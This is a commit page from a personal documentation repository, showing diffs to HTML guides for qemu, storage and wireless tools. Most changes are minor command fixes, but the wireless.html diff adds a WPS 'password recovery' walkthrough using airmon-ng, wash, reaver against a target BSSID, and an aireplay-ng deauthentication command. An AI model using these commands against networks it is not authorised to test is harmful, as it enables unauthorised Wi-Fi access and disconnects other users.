diff options
author | Silvino Silva <silvino@bk.ru> | 2020-01-05 21:55:09 +0000 |
---|---|---|
committer | Silvino Silva <silvino@bk.ru> | 2020-01-05 21:56:17 +0000 |
commit | 2699bee925ca6ce95bf14bc95249b22952aaf478 (patch) | |
tree | 2ec98bf4f1a7954750822cfd49641c8987585a91 /tools | |
parent | 627cd2d2e99c1bb9fce293375198da5e66c0ed4b (diff) | |
parent | 9a72a6e5cc23d29d510625c0c1677fb7ae465032 (diff) | |
download | doc-2699bee925ca6ce95bf14bc95249b22952aaf478.tar.gz |
doc release 0.6.0
Diffstat (limited to 'tools')
-rw-r--r-- | tools/qemu.html | 4 | ||||
-rw-r--r-- | tools/storage.html | 2 | ||||
-rw-r--r-- | tools/wireless.html | 38 |
3 files changed, 34 insertions, 10 deletions
diff --git a/tools/qemu.html b/tools/qemu.html index d6c1738..262781e 100644 --- a/tools/qemu.html +++ b/tools/qemu.html @@ -176,13 +176,13 @@ the current setting? Fix/Ignore? Fix - (parted) resize 3 100% + (parted) resizepart 3 100% (parted) quit </pre> <pre> - # resize2fs /dev/mapper/nbd0p3 # e2fsck /dev/mapper/nbd0p3 + # resize2fs /dev/mapper/nbd0p3 </pre> <h2 id="net">3. Network</h2> diff --git a/tools/storage.html b/tools/storage.html index 3a0a064..5f7e5e3 100644 --- a/tools/storage.html +++ b/tools/storage.html @@ -143,8 +143,8 @@ images read <a href="qemu.html#resize">resize images</a></p> <pre> - # resize2fs /dev/sda3 # e2fsck /dev/sda3 + # resize2fs /dev/sda3 </pre> <a href="index.html">Tools Index</a> diff --git a/tools/wireless.html b/tools/wireless.html index f4eeddb..afb12b3 100644 --- a/tools/wireless.html +++ b/tools/wireless.html @@ -13,11 +13,7 @@ # iwconfig wlp2s0 essid name_of_network </pre> - <h4>Recover Password WPS</h4> - - <p>Tested on debian system only.</p> - - <p>First get mac address of the target cell;</p> + <p>To get mac address of the target cell;</p> <pre> # iwlist wlp2s0 scan @@ -29,6 +25,11 @@ Cell 03 - Address: A8:A6:68:98:0C:C5 </pre> + + <h4>Recover Password WPS</h4> + + <p>First check processes that interfere with state of the interface and kill them;</p> + <pre> # airmon-ng check @@ -57,7 +58,7 @@ # kill -9 1271 </pre> - <p>Just to be sure that everything is as it should;</p> + <p>If wireless card is intel;</p> <pre> # rmmod iwlmvm @@ -82,6 +83,18 @@ (monitor mode enabled on mon0) </pre> + <p>Airdump-ng don't report if a router have WPS or not, for that is used wash;</p> + + <pre> + # wash -i wlp2s0 + </pre> + + <p>If the program report "Found packet with bad FCS", run with -C;</p> + + <pre> + # wash -C -i wlp2s0 + </pre> + <p>Put mon0 on same channel of target cell;</p> <pre> @@ -91,8 +104,19 @@ <p>Start the magic;</p> <pre> - # reaver -i mon0 -b A8:A6:68:98:0C:C5 -vv + # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -vv </pre> + <p>If BSSID is cloaked, not being broadcasted, provide it to reaver;</p> + + <pre> + # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -e "bssid_name" -vv + </pre> + + <p>-a address of access point, -c client to deauthenticate</p> + + <pre> + aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 + </pre> </body> </html> |